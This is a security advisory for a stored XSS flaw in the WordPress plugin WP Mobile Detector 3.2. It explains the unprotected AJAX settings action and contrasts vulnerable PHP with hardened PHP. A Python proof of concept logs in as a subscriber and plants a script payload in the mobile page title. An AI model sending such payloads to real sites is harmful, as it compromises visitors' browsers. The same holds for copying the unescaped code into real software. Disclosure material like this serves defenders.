WP Mobile Detector 3.2, Persistent XSS
The WP Mobile Detector plugin registers the AJAX action ‘websitez_options’ (wp-mobile-detector/websitez-wp-mobile-detector.php, line 78) so that any registered user, regardless of role, can call it. The handler stores the submitted option values without sanitising them, and the mobile_title value is later written unescaped into the <title> element of pages served to mobile visitors. A registered user can therefore plant a persistent (stored) XSS payload that executes in the browser of every mobile visitor to the site.
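To make the root cause concrete, the following shows the vulnerable handler pattern next to a hardened form. This is an added illustration written for this advisory, not the plugin's own code: only the action name and the two form keys (general[selected_mobile_theme], general[mobile_title]) come from the advisory; the function names, the option name websitez_general and the theme allow-list are assumptions.

```php
<?php
// Added illustration; not the plugin's code. Action name and form keys are from
// the advisory; option name, function names and theme list are assumed.

// --- Vulnerable pattern ----------------------------------------------------
// wp_ajax_* hooks fire for every logged-in user. Nothing here restricts the
// caller to administrators, checks a nonce, or sanitises what gets stored.
function websitez_options_vulnerable() {
    $general = isset($_POST['general']) ? $_POST['general'] : array();
    update_option('websitez_general', $general);   // stored verbatim
    wp_die();
}
// add_action('wp_ajax_websitez_options', 'websitez_options_vulnerable');

// ...and on a page served to a mobile visitor the stored value is echoed raw,
// so "</title><script>alert(1)</script><title>" closes the element and runs.
function websitez_mobile_title_vulnerable() {
    $general = get_option('websitez_general', array());
    echo '<title>' . $general['mobile_title'] . '</title>';   // unescaped
}

// --- Hardened form -----------------------------------------------------------
function websitez_options_hardened() {
    // 1. Only users allowed to change site options may call this action.
    if (!current_user_can('manage_options')) {
        wp_send_json_error('insufficient privileges', 403);
    }
    // 2. CSRF protection: the settings form must carry a matching nonce.
    check_ajax_referer('websitez_options_nonce', '_wpnonce');

    $general = (isset($_POST['general']) && is_array($_POST['general']))
        ? $_POST['general'] : array();

    // 3. Allow-list the theme and sanitise the free-text title on input.
    $allowed_themes = array('wz-mobile');   // assumed list of installed themes
    $theme = isset($general['selected_mobile_theme']) ? $general['selected_mobile_theme'] : '';
    if (!in_array($theme, $allowed_themes, true)) {
        wp_send_json_error('unknown theme', 400);
    }
    $title = isset($general['mobile_title'])
        ? sanitize_text_field(wp_unslash($general['mobile_title'])) : '';

    update_option('websitez_general', array(
        'selected_mobile_theme' => $theme,
        'mobile_title'          => $title,
    ));
    wp_send_json_success();
}
add_action('wp_ajax_websitez_options', 'websitez_options_hardened');

// 4. Escape on output as well. esc_html() turns "</title><script>" into
//    "&lt;/title&gt;&lt;script&gt;", which the browser shows as text inside
//    the (RCDATA) title element rather than parsing it as markup.
function websitez_mobile_title_hardened() {
    $general = get_option('websitez_general', array());
    $title   = isset($general['mobile_title']) ? $general['mobile_title'] : '';
    echo '<title>' . esc_html($title) . '</title>';
}
```

The capability check is what closes the privilege gap described in the advisory (an ordinary registered user should not be able to reach a site-wide settings writer at all); the nonce, input sanitisation and output escaping are defence in depth so that a single missing check does not again become a stored XSS.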
Homepage
https://wordpress.org/plugins/wp-mobile-detector/
CVSS Score
4.0 (CVSS v2)
CVSS Vector
(AV:N/AC:L/Au:S/C:N/I:P/A:N)
Attack Scope
remote
Authorization Required
Registered
Mitigation
Update to version 3.3
Proof of Concept
The PoC below logs in as an ordinary registered user and stores the payload through the exposed AJAX action; from then on the alert fires for every mobile visitor to the site. The request must name a valid (installed) mobile theme in selected_mobile_theme, otherwise the options are not accepted.
import requests

s = requests.Session()
target = 'http://localhost'

# Step 1: authenticate as any registered user (a Subscriber-level account is enough).
url = '%s/wp-login.php' % target
payload = {
    "log": "test",
    "pwd": "test",
    "wp-submit": "Log In",   # value is not checked by WordPress; sent for completeness
}
r = s.post(url, data=payload)

# Step 2: call the unprotected AJAX action. The crafted mobile_title is stored
# unsanitised and later emitted inside <title> on pages served to mobile visitors,
# so "</title>" closes the element and the script runs. selected_mobile_theme must
# name a theme that actually exists on the site (here wz-mobile).
url = '%s/wp-admin/admin-ajax.php' % target
payload = {
    "action": "websitez_options",
    "general[selected_mobile_theme]": "wz-mobile",
    "general[mobile_title]": "</title><script>alert(1)</script><title>",
}
r = s.post(url, data=payload)

# Step 3 (verification; assumes the plugin detects mobile clients by User-Agent):
# fetch the front page as a mobile browser and look for the unescaped payload.
r = s.get(target, headers={"User-Agent": "Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X)"})
print("stored XSS present" if "<script>alert(1)</script>" in r.text else "payload not found")
Timeline
- 2015-05-13: Discovered
- 2015-05-13: Vendor notified
- 2015-05-13: Vendor responded
- 2015-06-09: Fix shown; vendor indicated release pending that week
- 2015-06-17: Update requested from vendor, as no release had been made the previous week
- 2015-06-18: Version 3.3 released – issue resolved
- 2015-06-25: Advisory released